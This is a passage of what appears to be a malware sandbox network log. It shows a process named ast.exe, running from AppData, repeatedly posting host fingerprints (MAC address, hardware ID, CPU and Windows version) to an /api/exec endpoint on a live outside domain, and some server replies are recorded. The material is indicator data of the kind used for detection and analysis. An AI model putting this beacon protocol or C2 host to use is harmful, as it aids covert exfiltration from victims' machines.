Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:19 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:56:19 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49905 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:20 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:20 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49913 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:21 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:21 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49940 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:24 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:24 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49948 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:25 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:25 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49956 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:26 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:26 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49964 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:27 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:27 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49972 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:28 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:28 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49980 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:29 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:29 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49989 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:30 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:30 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50001 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:31 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:31 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50007 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:31 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:31 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:56:32 UTC | 166 | IN | HTTP/1.1 200 OK
server: nginx/1.22.1
date: Tue, 19 Nov 2024 17:56:32 GMT
content-type: text/html
content-length: 98
cache-control: private
connection: close
2024-11-19 17:56:32 UTC | 98 | IN | Data Ascii: bwEQ#trs011.xn--80akicokc0aablc.xn--p1ai142 104 603


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50018 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:33 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 256
2024-11-19 17:56:33 UTC | 256 | OUT | Data Ascii: 1:4X]LAlpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
2024-11-19 17:56:33 UTC | 390 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 256
1:vKlGnpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
2024-11-19 17:56:33 UTC | 390 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 256
1:I*K1pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
2024-11-19 17:56:33 UTC | 390 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 256
1:6otL?:pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
2024-11-19 17:56:33 UTC | 390 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 256
1:mF$~Wpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
2024-11-19 17:56:33 UTC | 168 | IN | HTTP/1.1 200 OK
server: nginx/1.22.1
date: Tue, 19 Nov 2024 17:56:33 GMT
content-type: text/html
content-length: 2078
cache-control: private
connection: close
2024-11-19 17:56:33 UTC | 2078 | IN | Data Ascii: :4X]LAlD11234651078111418171315D10D20D3D40D507>20OD61D7D82,1,3,4,6,5,10,7,8,30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50038 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:35 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:35 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50046 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:36 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:36 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50054 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:37 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:37 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50062 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:38 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:38 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50071 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:38 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:38 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50089 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:40 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:40 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50098 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:41 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:41 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50103 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:42 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:42 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50106 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:43 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:43 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50109 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:44 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:44 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50112 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:44 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:44 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50115 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:45 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:45 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50118 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:46 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:46 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50121 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:47 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:47 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50124 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:48 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:48 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50127 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:48 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:48 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50130 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:49 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:49 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 50133 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:50 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:50 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50136 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:51 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:51 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50139 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:52 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:52 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50142 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:52 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:52 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50145 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
